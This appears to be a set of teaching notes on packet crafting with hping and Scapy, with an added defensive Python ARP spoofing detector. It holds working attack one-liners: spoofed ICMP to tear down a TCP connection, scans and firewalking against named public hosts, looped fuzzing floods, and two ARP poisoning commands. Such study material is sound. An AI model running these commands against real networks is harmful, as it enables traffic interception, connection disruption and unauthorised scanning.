PacketGenerator

Hping

Generating a TCP SYN packet
    hping --syn -p 80 www.usc.edu

Sending a ping from a fake source
    hping --icmp -C 0 -K 0 -a 192.168.1.1 192.168.1.10

Break an established TCP/IP connection
    hping --icmp -C 3 -K 1 -a 192.168.1.1 --icmp-ipdst update.microsoft.com --icmp-ipsrc victim --icmp-srcport 1034 --icmp-dstport 80 victim

Port scanning the bored way
    hping www.usc.edu --syn -p 79
    Press CTRL-Z to increment the port number
    hping --scan 79-81 www.usc.edu -S

Listening for 404 errors
    hping --listen "404"

Traceroute over TCP on port 80
    hping --traceroute www.google.com --syn -p 80

Scapy

Testing a network stack with a bad packet
    >>> IP(version=2, ihl=3, options="love", proto=1)/TCP()

Creating an implicit packet
    >>> pkts = IP(ttl=[1,3,5,(7,10)])/TCP()
    >>> pkts
    >>> [pkt for pkt in pkts]

This is a ping scan on the first 10 IPs of the 192.168.*.* network
    >>> IP(dst="192.168.*.1-10")/ICMP()

Do a TCP/SYN scan on all privileged ports on the 192.168.4.0/24 network
    >>> IP(dst="192.168.4.0/24")/TCP(dport=(0,1024))

Navigating between layers
    >>> a=Ether()/IP()/TCP()
    >>> a
    >>> a.payload
    >>> a.payload.payload

Another way to access fields in Scapy
    >>> a[IP]
    >>> a[TCP]
    >>> a[IP].dst

A TCP SYN scan
    >>> sr(IP(dst="192.168.5.1")/TCP(dport=[(1,1024),3128,8080]))
    >>> res,unans=_
    >>> res.nsummary()

Displaying the results in a nicer way
    >>> # flags & 2 keeps only replies with the SYN bit set; prn prints the probed port
    >>> res.nsummary(lfilter=lambda s,r: r[TCP].flags & 2, prn=lambda s,r: s.dport)

Checking Google
    >>> res1,unans1=sr(IP(dst="www.google.com")/TCP(dport=[79,80]))
    >>> res1.nsummary()

Check Slashdot
    >>> res2,unans2=sr(IP(dst="www.slashdot.org")/TCP(dport=[79,80]))
    >>> res2.nsummary()

ARP Poisoning #1
    >>> sendp(Ether(dst=VICTIM.MAC)/ARP(op="is-at", pdst=VICTIM.IP, hwdst=VICTIM.MAC, psrc=ATK.IP, hwsrc=ATK.MAC), iface="eth0")

ARP Poisoning #2
    >>> sendp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=VICTIM.IP, psrc=ATK.IP, hwsrc=ATK.MAC), iface="eth0")
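
A defensive counterpart to the two ARP poisoning one-liners above, added here as an example that is not part of the original slides: a standard-library Python detector that parses raw Ethernet/ARP frames and flags unsolicited is-at replies and any ARP packet that rebinds a known IP to a new MAC. The function names, addresses and sample frames are constructed for illustration.

```python
import socket
import struct

ARP_ETHERTYPE = 0x0806

def parse_arp(frame):
    """Return (op, sender_mac, sender_ip, target_ip) for Ethernet/IPv4 ARP, else None."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ARP_ETHERTYPE:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return (op, frame[22:28].hex(":"), socket.inet_ntoa(frame[28:32]),
            socket.inet_ntoa(frame[38:42]))

def detect(frames):
    """Flag replies nobody asked for and any ARP packet that rebinds a known IP."""
    bindings, pending, alerts = {}, set(), []
    for n, frame in enumerate(frames):
        parsed = parse_arp(frame)
        if parsed is None:
            continue
        op, smac, sip, tip = parsed
        if op == 1:                      # who-has: remember the IP being asked for
            pending.add(tip)
        elif op == 2:                    # is-at: must answer an observed request
            if sip not in pending:
                alerts.append((n, "unsolicited-reply", sip, smac))
            pending.discard(sip)
        # Requests update caches too, so check the sender binding for both opcodes.
        if bindings.get(sip, smac) != smac:
            alerts.append((n, "binding-changed", sip, smac))
        bindings[sip] = smac
    return alerts

def build(op, smac, sip, tmac, tip, eth_dst="ff:ff:ff:ff:ff:ff"):
    """Build a raw Ethernet/ARP frame; used only for the constructed sample below."""
    h = lambda m: bytes.fromhex(m.replace(":", ""))
    hdr = struct.pack("!HHHBBH", ARP_ETHERTYPE, 1, 0x0800, 6, 4, op)
    return (h(eth_dst) + h(smac) + hdr + h(smac) + socket.inet_aton(sip)
            + h(tmac) + socket.inet_aton(tip))

# Constructed sample: host asks for the gateway, gateway answers, then a forged reply.
GW, HOST, ROGUE = "aa:aa:aa:00:00:01", "aa:aa:aa:00:00:10", "de:ad:be:ef:00:66"
ZERO = "00:00:00:00:00:00"
SAMPLE = [
    build(1, HOST, "192.168.1.10", ZERO, "192.168.1.1"),
    build(2, GW, "192.168.1.1", HOST, "192.168.1.10", eth_dst=HOST),
    build(2, ROGUE, "192.168.1.1", HOST, "192.168.1.10", eth_dst=HOST),
]
```

Calling `detect(SAMPLE)` reports both alerts for the third frame; the binding check also fires when the forged packet is a broadcast request rather than a reply.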

Traceroute with Scapy
    >>> res,unans=sr(IP(dst="www.google.com", ttl=(1,30))/TCP(sport=RandShort(),dport=80))
    >>> res.make_table(lambda s,r: (s.dst, s.ttl, r.sprintf("%IP.src%{TCP: %TCP.flags%}")))

Firewalking
    >>> res,unans=sr(IP(dst=TARGET,ttl=23)/TCP(dport=[22,23,25,113,80,443]), timeout=4, retry=-2)
    >>> res.make_table(lambda s,r: (s.dst, s.dport, r.sprintf("{TCP:%TCP.flags%}{ICMP:%IP.src%#%r,ICMP.type%}")))

Fuzzing Example #1
    >>> a=IP()/TCP()
    >>> hexdump(a)
    >>> b=fuzz(a)
    >>> hexdump(b)
    >>> ls(b)

Fuzzing Example #2
    >>> send(fuzz(IP(dst=TARGET, chksum=RandShort())/TCP()), loop=1)
    >>> send(fuzz(IP(dst=TARGET)/TCP()), loop=1)
    >>> send(fuzz(IP(dst=TARGET, version=4, chksum=RandShort())/TCP()), loop=1)

Reference: Security Power Tools, Ch. 6

This document was uploaded on 09/13/2010.
